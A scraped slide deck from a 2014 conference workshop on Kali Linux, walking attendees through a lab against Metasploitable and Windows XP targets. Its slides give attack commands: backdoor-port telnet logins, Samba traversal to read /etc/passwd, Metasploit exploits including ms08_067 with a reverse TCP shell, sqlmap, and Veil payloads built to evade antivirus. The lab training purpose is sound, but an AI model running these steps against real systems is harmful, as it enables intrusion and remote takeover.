TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 

Último (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 

Kali Linux - Falconer

  • 1. Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge
  • 2. Welcome – Salt Fork 2014
  • 3. Welcome Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
  • 4. Who or What is ‘Kali’?
  • 5. Who is Kali? Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli
  • 7. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
  • 8. What’s on the DVD? /books ◦Official Kali Guide ◦eForensics /media ◦7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /metaspolitable /PPT
  • 10.
  • 11. Legend  We‟re going to type something  We‟re going to make a note  Might be a question?  We‟re going to click on something  Recon  Attack
  • 13. Use your powers for good
  • 14. Getting Ready… - Let‟s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let‟s make sure the virtual environments are working and can „ping‟ each other
  • 15. VMware Player Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
  • 16. Logins / Passwords Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin
  • 17. Metaspolitable V/E  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
  • 18. Metaspolitable V/E Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx
  • 19. Kali V/E  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
  • 20. Kali V/E Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]
  • 21. Kali Updating From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.
  • 23. There are several categories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services
  • 26. ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
  • 27. top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor
  • 28. df  df Tells us how much space is available or „disk free‟
  • 29. du  du Tells us how much space is taken or „disk used‟. You can get a shorter report by…  „du –s‟ … (disk used –summary)
  • 30. free  free How much „free‟ memory is available
  • 31. ls  ls This is for „list‟  ls –l (list –long)  ls -la (list – long – all attributes)
  • 32. pwd  pwd Directory structure Means „path to working directory‟ or „print working directory‟
  • 33. ps / ps aux / pstree  ps Means „Process Status‟ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)
  • 35. Can you ‘ping’ each other? Virtual Environment #1 (Metaspolitable) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down… Virtual Environment #2 (Kali) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down…
  • 37. traceroute  traceroute Essentially, „tracert‟ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
  • 38. nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
  • 39. nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan, and „A‟ is O/S detection, services, service pack.
  • 40. rlogin (from Metaspolitable)  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
  • 41. rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
  • 42. showmount  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.
  • 43. telnet  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP
  • 44. telnet  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server
  • 45. telnet  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
  • 46. telnet  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
  • 48. smbclient  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp
  • 49. smbclient  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit
  • 50. smbclient  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?
  • 51. tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com
  • 52. netdiscover On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.
  • 53. nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
  • 54. sqlmap On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
  • 55. Wasp Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
  • 56. Web Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application
  • 57. whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
  • 58. From Kali - msfconsole Presentation on Kali Linux
  • 59. msfconsole From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools
  • 60. msfconsole From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
  • 61. msfconsole From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….
  • 62. msfconsole From [msf>] console, search for „unreal‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
  • 63. msfconsole From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit 
  • 64. msfconsole From [msf>] console, search for „twiki‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
  • 65. msfconsole From [msf>] console (ex: „twiki‟)  set RHOST <IP Address>  show options  exploit 
  • 66. msfconsole From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2
  • 67. msfconsole From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads
  • 68. msfconsole From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>
  • 69. msfconsole From [msf>] console, (target: Win XP)  show options  exploit  Any errors? 
  • 70. From Kali – more GUI Presentation on Kali Linux
  • 71. Zenmap Let‟s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
  • 72. SHODAN Let‟s run SHODAN  Open a browser  www.shodanhq.com  type in „almost anything‟  …Be very nervous…
  • 73. FERN Let‟s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker
  • 74. recon-ng Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.
  • 75. recon-ng Let‟s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site
  • 76. recon-ng Let‟s run recon-ng…  set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules
  • 77. recon-ng Let‟s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default
  • 78. dmitry If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP‟s
  • 79. veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
  • 80. veil Let‟s run veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
  • 81. veil Let‟s run veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
  • 82. veil Let‟s run veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
  • 84. Kali Information See „Notes‟ section in this slide
  • 85. Kali Comparisons See „Notes‟ section in this slide
  • 86. Kali-specific Websites See „Notes‟ section in this slide
  • 87. Kali Publications See „Notes‟ section in this slide
  • 90. Kali in a box? Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/
  • 91. Pentesting with Firefox? The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and „use your powers for good‟.
  • 93. Thank you Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859

Notas do Editor

  1. Presentation on Kali LinuxTGodfrey – Falconer TechnologiesOhio HTCIA – Salt Fork conference – 5/2014
  2. http://www.hackingwithkalilinux.tk/2014/02/getting-your-pentesting-lab-ready.htmlhttp://www.hacking-tutorial.com/http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/http://efytimes.com/e1/fullnews.asp?edid=121888
  3. https://pentest-tools.com/homehttp://www.softwaretestinghelp.com/penetration-testing-tools/https://pentestmag.com/http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://www.security-audit.com/blog/penetration-testing-tools/http://www.bulbsecurity.com/smartphone-pentest-framework/
  4. http://kali4hackers.blogspot.com/http://www.hackingwithkalilinux.tk/2013/08/kali-linux.htmlhttp://www.youtube.com/watch?v=3OM22HqvX14http://www.kalilinux.net/community/threads/custome-command-prompt.243/http://hackwithkalilinux.blogspot.com/http://www.dailymotion.com/video/x1a348p_class-1-learn-kali-linux-basics-watch-in-hd_techhttp://www.markdubois.info/weblog/2014/02/kali-linux/http://go.kblog.us/2013/03/hacking-and-cracking-wep-with-kali-linux.htmlhttp://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/http://anonymous1769.blogspot.com/2013/12/all-commands-for-backtrack-kali-linux.htmlhttp://www.ehacking.net/2013/05/kali-linux-tutorial-websploit-framework.html
  5. http://docs.kali.org/pdf/kali-book-en.pdfhttps://eforensicsmag.com/from-backtrack-to-kalilinux/http://www.amazon.com/Basic-Security-Testing-Kali-Linux/dp/1494861275/ref=sr_1_1?ie=UTF8&amp;qid=1399928840&amp;sr=8-1&amp;keywords=kali+linuxhttp://www.amazon.com/Kali-Linux-Assuring-Security-Penetration/dp/184951948X/ref=sr_1_2?ie=UTF8&amp;qid=1399928876&amp;sr=8-2&amp;keywords=kali+linux
  6. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/http://www.concise-courses.com/security/50-firefox-pentesting-addons/
  7. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/http://www.concise-courses.com/security/50-firefox-pentesting-addons/